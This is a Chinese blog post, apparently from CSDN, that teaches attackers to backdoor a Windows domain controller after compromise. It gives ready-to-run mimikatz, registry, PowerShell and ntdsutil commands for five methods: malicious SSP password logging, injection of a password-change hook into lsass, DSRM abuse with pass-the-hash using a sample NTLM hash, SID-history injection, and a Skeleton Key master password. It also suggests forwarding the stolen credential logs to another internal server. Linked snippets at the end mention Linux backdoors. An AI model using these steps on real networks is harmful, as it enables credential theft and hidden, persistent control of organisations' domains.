内网渗透之权限维持-域控后门-SSP&HOOK&DSRM&SID&Skeleton-Key

已于 2023-05-14 20:45:50 修改
阅读量718 收藏 1
点赞数
分类专栏: 内网渗透 文章标签: java windows 开发语言
于 2023-05-14 20:23:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130671518
版权

权限维持-基于验证DLL加载-SSP

方法一:但如果域控制器重启,被注入内存的伪造的SSP将会丢失。
mimikatz

privilege::debug
misc::memssp

在这里插入图片描述
C:\Windows\System32\mimilsa.log 记录登录的账号密码
在这里插入图片描述

方法二:使用此方法即使系统重启,也不会影响到持久化的效果。
1.把mimiakatz下的mimilib.dll 放到目标域控的c:\windows\system32\目录下
2.修改注册表,重启生效
查询

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

修改

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

在这里插入图片描述
c:\windows\system32\kiwissp.log 记录账号密码文件
在这里插入图片描述
这两种方法配合使用效果更好,可以把密码账号文件发到内网一台web服务器或邮件服务器,方便即使获取账号密码

权限维持-基于验证DLL加载-HOOK

方法一

powershell
Import-Module .\Invoke-ReflectivePEInjection.ps1
Invoke-ReflectivePEInjection -PEPath HookPasswordChange.dll -procname lsass
或把HookPasswordChange.dll放到域控中,下面的脚本包含上面两条命令。所以直接运行即可
.\HookPasswordChangeNotify.ps1

在这里插入图片描述
方法二

powershell -exec bypass -Command "& {Import-Module 'C:\Invoke-ReflectivePEInjection.ps1';Invoke-ReflectivePEInjection -PEPath C:\HookPasswordChange.dll -procname lsass}"

报错解决:

powershell
Set-ExecutionPolicy
unrestricted

修改密码后可触发记录密码操作
文件位置c:/windows/temp/password.txt
在这里插入图片描述

权限维持-基于机制账号启用-DSRM

1.获取dsrm及krbtgt的NTLM hash

privilege::debug
lsadump::lsa /patch /name:krbtgt
token::elevate
lsadump::sam

在这里插入图片描述
2.dsrm&krbtgt&NTLM hash同步

NTDSUTIL    #打开ntdsutil
set DSRM password  #修改DSRM的密码
sync from domain account krbtgt     #使DSRM的密码和指定域用户的密码同步
q            (第1次)#退出DSRM密码设置模式
q            (第2次)#退出ntdsutil

在这里插入图片描述
失败的话启用krbtgt账户(域管理中心-users)修改用户账号密码永不过期即可
3.修改dsrm登录方式

powershell
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa\" -name "dsrmadminlogonbehavior" -value 2 -propertyType DWORD

在这里插入图片描述

4.利用PTH传递攻击

privilege::debug
sekurlsa::pth /domain:owa2010cn-god /user:administrator /ntlm:b097d7ed97495408e1537f706c357fc5
之后会弹出一个cmd
dir \\owa2010cn-god\c$

在这里插入图片描述
或使用psexec,wmiexec进行pth攻击(域名没成功,主机名成功,按理来说应该都可以)

psexec.exe  owa2010cn-god/administrator@192.168.3.21 -hashes 
:b097d7ed97495408e1537f706c357fc5

在这里插入图片描述

技术总结:
利用系统自带机制模式DSRM,修改DSRM默认登录方式和属性,通过其同步krgtgt进行PTH攻击,实现持续化控制,但适用于系统=>windows server2008。每个域控制器都有本地管理员账号和密码(与域管理员账号和密码不同)。DSRM账号可以作为一个域控制器的本地管理员用户,通过网络连接域控制器,进而控制域控制器。

权限维持-基于用户属性修改-SID history

1.获取某用户SID属性:
powershell

Import-Module ActiveDirectory
Get-ADUser webadmin -Properties sidhistory

在这里插入图片描述

2.给予某用户administrator属性:
mimiakatz

privilege::debug
sid::patch
sid::add /sam:webadmin /new:administrator

在这里插入图片描述
3.测评给与前后的DC访问权限:

dir \\192.168.3.21\c$

在这里插入图片描述
技术总结:
把域控管理员的SID加入到 其他某个 恶意的域账户的SID History中,然后,这个恶意的(我们自己创建的)域账户就可以域管理员权限访问域控了,不修改域账户一直存在,和直接加入域管理员组不一样,在用户和组中看不到域成员有管理员权限

权限维持-基于登录进程劫持-Skeleton Key(万能密码)

1、测试域内某个用户与DC通讯

dir \\owa2010cn-god\c$

2、连接DC后,DC注入lsass进程
mimikatz:

privilege::debug
misc::skeleton

在这里插入图片描述
3.重新测试域内某个用户与DC通讯

net use \\owa2010cn-god\ipc$ "mimikatz" /user:god\administrator
dir \\owa2010cn-god\c$

在这里插入图片描述
技术总结:
如果ip地址失败,就使用计算机名
因为Skeleton Key技术是被注入到lsass.exe进程的,
所以它只存在内存中,如域控重启,万能密码将失效

mushangqiujin
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-Linux权限维持
lza20001103的博客
09-26 2365
Linux权限维持 文章目录Linux权限维持前言ssh后门Setuid and SetgidLinux隐藏技术后记 前言 前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。 ssh后门 过滤 ps -elf |grep 12345 监听端口 nc -lvvp 123 查看端口 netstat -anlp|grep 12345 (1)ssh后门(脚本内容)(192.168.231.134) #!
内网渗透——权限维持
cldimd的博客
03-23 1181
一、权限维持: 当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门维持权限,达到持续控制的目的。 二、获取windows系统登陆账号: 系统登陆账号存储位置:C:\Windows\System32...
内网渗透 - 权限维持 - Linux
weixin_30855099的博客
08-22 290
1.预加载型动态链接库后门2.strace后门3.ssh后门4.OpnenSSH后门5.sshd软链接后门6.wrapper后门7.SUID后门8.inetd服务后门9.协议后门10.vim后门11.PAM后门12.进程注入13.Rootkit 转载于:https://www.cnblogs.com/AtesetEnginner/p/11397184.html...
内网渗透权限维持
welcome.php
06-08 1811
这里写目录标题1介绍2普通权限3高级权限 1介绍 2普通权限 3高级权限 1
[内网渗透]—权限维持
Sentiment的博客
12-16 918
当拿到域控权限后,使用mimikatz可以注入Skeleon Key,将 Skeleton Key 注入域控制器的 lsass.exe 进程,这样会在域内的所有账号中添加一个 Skeleton Key,而这个key是自己设定的所以可以随时共享访问。PS:由于注入到lsass.exe进程中,所以每次关机后就不存在了,但一般在真正的域环境中,域控在很长一段时间内是不会重启的,因此可以作为权限维持的一种方式。
东方SSP-1调速器说明书
04-18
### 东方SSP-1调速器操作与安全使用指南 #### 一、产品概述 东方SSP-1调速器是一种专为感应电机设计的速度控制器,能够有效地控制电机的转速,适用于多种工业场景。该调速器通过与特定型号的马达以及电容器配合...
CAN-I2S-I2C-SPI-SSP.zip_SSP
09-21
本文将深入探讨五种常见的串行通信协议:CAN(Controller Area Network)、I2S(Inter-IC Sound)、I2C(Inter-Integrated Circuit)、SPI(Serial Peripheral Interface)以及SSP(Serial Synchronous Protocol),...
ISC-内网渗透 -最终版.pdf
最新发布
04-08
通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍,我们可以了解到,在实施内网渗透时,掌握这些核心技术点对于成功渗透目标网络至关重要。此外,合理运用各种技术和工具...
电源技术中的尼古拉•特斯拉和无线电力传输的未来
10-19
当前,实现长距离无线电力传输的技术主要有两种:太空太阳能(Space-Based Solar Power, SSP)和射频识别(Radio-Frequency Identification, RFID)。太空太阳能利用地球轨道上的太阳能电池板收集太阳能,然后通过...
ssp-dccy-1.34.0.apk.1.1.1.1.1.1
10-13
ssp-dccy-1.34.0.apk.1.1.1.1.1.1
内网渗透-域内的权限维持
lza20001103的博客
10-01 1004
域内的权限维持 文章目录域内的权限维持前言PTTTGT(黄金票据)sspSkeleton KeySID History后记 前言 上期我们讲了windows和Linux中的权限维持,这期我们讲一下域内的权限维持权限维持是后渗透必不可少的环节,大家一定要好好掌握啊。 PTT PTT(票据) window认证机制 http://note.youdao.com/noteshare?id=cb8c505af1c38b461be8e964e9825dca&sub=F271F9DD1A894C4188D1AE
内网渗透-linux权限维持
lza20001103的博客
08-25 638
内网渗透-linux权限维持 文章目录内网渗透-linux权限维持添加用户存在交互的shell不允许uid=0的⽤户远程登录(高版本)没交互shell⽆回显添加Linux账户密码使用linux的perl直接写入/etc/passwd隐藏后门技巧修改文件属性文件锁定历史操作命令隐藏文件进程隐藏rookit后门ReptilePAMssh公私钥免密登录ssh秘钥计划任务 反弹shell 添加用户 UID=0是最高权限的用户,有时候不能被远程登录,可以创建一个普通用户。 正常可以通过 “id” 来查看当前的用户的U
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2359
小结下权限维持方法
内网渗透(六十八)之域权限维持Skeleton Key
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-12 659
戴尔的安全研究人员在一次威胁涉猎中发现了一种可以在活动目录上绕过的单因素身份验证的方法,该方法使得攻击者在获得域管理员权限或企业管理员权限的情况下,可以在目标域控的LSASS内存中注入特定的密码,然后就可以使用设置的密码来以任何用户身份登录,包括域管理员和企业管理员,而用户还可以使用之前正常的密码进行登录,这种攻击方式被称为Skeleton Key(万能密码)。由于设置Skeleton Key需要域管理员的权限或企业管理员权限,因此这种攻击方式通常用于域权限维持
windows权限维持SSP&HOOK&DSRM&SIDhistory&SkeletonKey
剁椒鱼头没剁椒的博客
08-15 1609
在内网中权限维持是非常重要的一部分,很多的时候再拿下一台服务器的时候,如果没做权限维持,可能今天你还能登陆或者访问,明天你就无法访问了,当然也不排除存在那些服务器常年没人管的情况,像这类的服务器基本上都是存在一些小企业,只要服务器正常运行,那就不用管,而且一些大型的企业,都会有固定的管理人员,对相应的服务器进行定期的杀毒,检查,那么如果中木马了,快点的可能几个小时就会被发现,慢点的也就几天。
内网权限维持
wuxinweii的博客
11-10 2795
攻击者在提升权限后,往往会通过建立后门维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统 一、粘贴键后门 windows 系统下连续按 5 次 shift 可调出其程序,粘滞键是为了那些按钮有困难的人设计的,就是按键困难,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么此时就可以单按 5 下 shift 键来启动粘滞键功能。 所以我们可以通过更改注册表的命令来进行后门维持 在命
权限维持域控后门&SSP&HOOK&DSRM&SID&万能钥匙
今天是几号的博客
04-09 1035
攻防实战中,靶机很难会重启,攻击者重启的话风险过大,因此可以在靶机上把两个方法相互结合起来使用效果比较好,尝试利用把生成的日志密码文件发送到内网被控机器或者临时邮箱。DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。
Windows权限维持方案(可过360主动防御)
jihaichen的博客
04-26 1631
Windows权限维持方案(可过360主动防御)
恩智浦(NXP) LPCXpresso-CN 开发板用户手册指南
- **软件资源列表**:提供了多个测试例程,如LEDBlinky、SYSTICK、TIMER32、SSP、UART和I2C Temperature Sensor,用于验证和测试开发板的功能。 2. **快速启用** - **文档描述**:介绍了手册的主要内容和结构。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值